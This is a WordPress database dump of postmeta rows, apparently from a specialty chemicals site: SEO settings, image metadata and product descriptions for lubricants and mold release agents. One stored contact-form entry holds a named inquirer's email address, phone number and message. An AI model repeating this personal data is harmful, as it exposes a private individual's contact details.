INSERT INTO `wp_postmeta` VALUES (21845, 1135, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (21851, 1128, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21852, 1128, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21853, 1128, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (21855, 1128, '_yoast_wpseo_focuskw', 'Dental Handpiece Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (21856, 1128, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (21857, 1128, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21858, 1128, '_yoast_wpseo_primary_category', '512'); 
INSERT INTO `wp_postmeta` VALUES (21860, 1128, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (21861, 474, '_wp_old_slug', 'fluoroextreme-dental-lubricants'); 
INSERT INTO `wp_postmeta` VALUES (21862, 474, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21863, 474, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21864, 474, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21865, 474, '_yoast_wpseo_focuskw_text_input', 'Dental Handpiece Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (21866, 474, '_yoast_wpseo_focuskw', 'Dental Handpiece Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (21867, 474, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21868, 474, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21869, 474, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21870, 474, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21871, 474, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21872, 474, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21873, 474, '_ywtm_content_tab_description', 'FluoroExtreme™ is a fluorinated synthetic dental lubricant specially designed for dental handpieces. This dental lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals. Benefits Include:\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (21874, 474, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (21875, 2282, '_edit_lock', '1475752905:1'); 
INSERT INTO `wp_postmeta` VALUES (21876, 2281, '_edit_lock', '1475752944:1'); 
INSERT INTO `wp_postmeta` VALUES (21877, 2297, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21878, 2297, '_seq_num', '33'); 
INSERT INTO `wp_postmeta` VALUES (21879, 2297, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21880, 2297, '_field_1', 'Carla Cheaib'); 
INSERT INTO `wp_postmeta` VALUES (21881, 2297, '_field_10', 'Libanet'); 
INSERT INTO `wp_postmeta` VALUES (21882, 2297, '_field_2', 'carla@libanet-lb.com'); 
INSERT INTO `wp_postmeta` VALUES (21883, 2297, '_field_8', '(961) 706-7300'); 
INSERT INTO `wp_postmeta` VALUES (21884, 2297, '_field_3', 'Dear Sir,\r\n\r\nwe are interested in the MS 260 screen cleaner and would appreciate some expedited information in order to put it in our offer.\r\nLibanet is a Cabin cleaning service that caters to major airlines in the middle east.  we will need the MSDS of the product as a start  and further a purchase point for following orders.\r\nthank you,\r\n\r\nCarla'); 
INSERT INTO `wp_postmeta` VALUES (21885, 2297, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21886, 2297, '_sub_id', '2297'); 
INSERT INTO `wp_postmeta` VALUES (21888, 1525, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21889, 1525, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21890, 1525, '_yoast_wpseo_focuskw_text_input', 'Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (21891, 1525, '_yoast_wpseo_focuskw', 'Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (21892, 1525, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21893, 1525, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21894, 1525, '_wp_old_slug', 'mold-release-agents-which-is-right-for-you'); 
INSERT INTO `wp_postmeta` VALUES (21895, 1525, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (21897, 1525, '_yoast_wpseo_linkdex', '93'); 
INSERT INTO `wp_postmeta` VALUES (21899, 1117, '_yoast_wpseo_linkdex', '88'); 
INSERT INTO `wp_postmeta` VALUES (21912, 2302, '_edit_lock', '1476301957:2'); 
INSERT INTO `wp_postmeta` VALUES (21913, 2302, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (21914, 2303, '_wp_attached_file', '2016/10/shutterstock_336329858.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21915, 2303, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4004;s:4:"file";s:34:"2016/10/shutterstock_336329858.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_336329858-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_336329858-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_336329858-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_336329858-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_336329858-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_336329858-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_336329858-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_336329858-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21916, 2302, '_thumbnail_id', '2303'); 
INSERT INTO `wp_postmeta` VALUES (21918, 2302, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21919, 2302, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21920, 2302, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (21921, 2302, '_yoast_wpseo_focuskw_text_input', 'Krytox Aviation'); 
INSERT INTO `wp_postmeta` VALUES (21922, 2302, '_yoast_wpseo_focuskw', 'Krytox Aviation'); 
INSERT INTO `wp_postmeta` VALUES (21923, 2302, '_yoast_wpseo_title', 'Krytox Aviation - Innovations for the Aviation Industry'); 
INSERT INTO `wp_postmeta` VALUES (21924, 2302, '_yoast_wpseo_metadesc', 'Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.'); 
INSERT INTO `wp_postmeta` VALUES (21925, 2302, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21926, 2302, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21927, 2302, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (21929, 2302, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (21930, 2302, '_yoast_wpseo_linkdex', '98'); 
INSERT INTO `wp_postmeta` VALUES (21931, 2305, '_edit_lock', '1475846442:2'); 
INSERT INTO `wp_postmeta` VALUES (21932, 2305, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (21933, 2306, '_wp_attached_file', '2016/10/shutterstock_481449616.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21934, 2306, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:34:"2016/10/shutterstock_481449616.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_481449616-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_481449616-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_481449616-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_481449616-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_481449616-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_481449616-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_481449616-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_481449616-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21935, 2305, '_thumbnail_id', '2306'); 
INSERT INTO `wp_postmeta` VALUES (21937, 2305, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (21938, 2305, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21939, 2305, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21940, 2305, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (21941, 2305, '_yoast_wpseo_focuskw_text_input', 'Valve Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (21942, 2305, '_yoast_wpseo_focuskw', 'Valve Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (21943, 2305, '_yoast_wpseo_title', 'Krytox Valve Lubricants and Applications - Plant Operations'); 
INSERT INTO `wp_postmeta` VALUES (21944, 2305, '_yoast_wpseo_metadesc', 'Control valves are critical components in plant operations around the world. Krytox valve lubricants maintain equipment integrity.'); 
INSERT INTO `wp_postmeta` VALUES (21945, 2305, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21946, 2305, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21947, 2305, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (21949, 2305, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (21950, 2308, '_edit_lock', '1477417691:2'); 
INSERT INTO `wp_postmeta` VALUES (21951, 2308, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (21952, 2309, '_wp_attached_file', '2016/10/shutterstock_373451452.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21953, 2309, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3836;s:6:"height";i:2557;s:4:"file";s:34:"2016/10/shutterstock_373451452.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373451452-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_373451452-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_373451452-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_373451452-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373451452-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373451452-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_373451452-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_373451452-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21954, 2308, '_thumbnail_id', '2309'); 
INSERT INTO `wp_postmeta` VALUES (21956, 2308, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (21957, 2308, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21958, 2308, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21959, 2308, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (21960, 2308, '_yoast_wpseo_focuskw_text_input', 'Corrugator Greases'); 
INSERT INTO `wp_postmeta` VALUES (21961, 2308, '_yoast_wpseo_focuskw', 'Corrugator Greases'); 
INSERT INTO `wp_postmeta` VALUES (21962, 2308, '_yoast_wpseo_title', 'Krytox Corrugator Greases | Applications | Product Information'); 
INSERT INTO `wp_postmeta` VALUES (21963, 2308, '_yoast_wpseo_metadesc', 'Krytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and equipment.'); 
INSERT INTO `wp_postmeta` VALUES (21964, 2308, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (21965, 2308, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21966, 2308, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (21968, 2308, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (21969, 2311, '_edit_lock', '1476301966:2'); 
INSERT INTO `wp_postmeta` VALUES (21970, 2311, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (21971, 2312, '_edit_lock', '1496666161:3'); 
INSERT INTO `wp_postmeta` VALUES (21972, 2312, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (21973, 2313, '_wp_attached_file', '2016/10/shutterstock_319726019.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21974, 2313, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5191;s:6:"height";i:3461;s:4:"file";s:34:"2016/10/shutterstock_319726019.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_319726019-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_319726019-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_319726019-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_319726019-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_319726019-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_319726019-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_319726019-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_319726019-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21975, 2311, '_thumbnail_id', '2313'); 
INSERT INTO `wp_postmeta` VALUES (21977, 2311, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (21978, 2311, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21979, 2311, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21980, 2311, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (21981, 2311, '_yoast_wpseo_focuskw_text_input', 'Krytox AGL 683'); 
INSERT INTO `wp_postmeta` VALUES (21982, 2311, '_yoast_wpseo_focuskw', 'Krytox AGL 683'); 
INSERT INTO `wp_postmeta` VALUES (21983, 2311, '_yoast_wpseo_title', 'Krytox AGL 683 - Aviation Gearbox Grease - Case Study'); 
INSERT INTO `wp_postmeta` VALUES (21984, 2311, '_yoast_wpseo_metadesc', 'Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque with exceptional lubricity.'); 
INSERT INTO `wp_postmeta` VALUES (21985, 2311, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21986, 2311, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21987, 2311, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (21989, 2311, '_yoast_wpseo_linkdex', '98'); 
INSERT INTO `wp_postmeta` VALUES (21991, 2311, 'ninja_forms_form', '11'); 
INSERT INTO `wp_postmeta` VALUES (21993, 2308, 'ninja_forms_form', '11'); 
INSERT INTO `wp_postmeta` VALUES (21995, 2305, 'ninja_forms_form', '11'); 
INSERT INTO `wp_postmeta` VALUES (21997, 2302, 'ninja_forms_form', '11'); 
INSERT INTO `wp_postmeta` VALUES (21999, 2056, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22001, 1117, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22003, 1525, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22005, 1128, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22007, 2312, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (22008, 2312, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (22009, 2312, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 143px;" width="336">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="133">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Dispersion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (22010, 2312, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nMS-145W is formulated to provide unmatched utility and economy in compression and transfer molding, particularly with Rubber to Metal bonding. MS-145W is compatible with the following materials\r\n<table style="height: 142px;" width="636">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Plastics</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          Fluorosilicones</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Nitrile</td>\r\n<td width="168">•          SBR</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Chlorinated Polyethylene</td>\r\n<td width="168">•          Natural and Synthetic Rubber</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (22011, 2312, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22012, 2312, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22013, 2312, '317_default_editor', 'Quart,Gallon, 5 Gallon, 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (22014, 2312, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22015, 2312, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (22016, 2312, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22017, 2312, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22018, 2312, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22019, 2312, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (22020, 2312, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22021, 2312, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22022, 2312, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (22023, 2312, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22024, 2312, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (22025, 2312, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (22026, 2312, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (22027, 2312, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (22028, 2312, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (22029, 2312, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22030, 2312, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22031, 2312, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22032, 2312, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (22033, 2312, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (22034, 2312, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22035, 2312, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (22036, 2312, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22037, 2312, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22038, 2312, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (22039, 2312, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22040, 2312, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22041, 2312, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (22042, 2312, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22043, 2312, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22044, 2312, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (22045, 2312, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22046, 2312, '_ywtm_content_tab_description', 'Miller-Stephenson\'s PTFE release agents is a water-based formulation which utilizes sub 1.0 micron PTFE (polytetrafluoroethylene) particles to impart superior lubricity, surface adhesion and durability, and outstanding mold release efficiency. The outstanding lubricity and extremely low coefficient of friction of this water based PTFE has been optimized for hot mold application (&gt;190 F / 88 C). The formulation has been further enhanced with proprietary surface activation chemistry to increase adhesion of the PTFE to the molding surface.  The result is a water-based release agent that is very cost-effective by maximizing releases per application and decreasing down-time. Benefits of this product include:\r\n<ul>\r\n 	<li>Water-based formulation; Hot mold optimized</li>\r\n 	<li>Enhanced surface adhesion; Maximized durability</li>\r\n 	<li>Excellent release of all polymer types</li>\r\n 	<li>Non-flammable; No VOC; No GWP</li>\r\n 	<li>Non-migrating</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (22047, 2312, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (22048, 2312, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22049, 2312, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22050, 2312, '_yoast_wpseo_focuskw_text_input', 'Water-based Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22051, 2312, '_yoast_wpseo_focuskw', 'Water-based Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22052, 2312, '_yoast_wpseo_title', 'Water-based Mold Release Agents | PTFE Dry Film | MS-145W'); 
INSERT INTO `wp_postmeta` VALUES (22053, 2312, '_yoast_wpseo_metadesc', 'PTFE Dry Film, water-based Mold Release Agents are optimized for hot mold applications. Superior durability which maximizes releases per application.'); 
INSERT INTO `wp_postmeta` VALUES (22054, 2312, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22055, 2312, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-145W","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22056, 2317, '_edit_lock', '1476301855:2'); 
INSERT INTO `wp_postmeta` VALUES (22057, 2318, '_wp_attached_file', '2016/10/shutterstock_72669607.jpg'); 
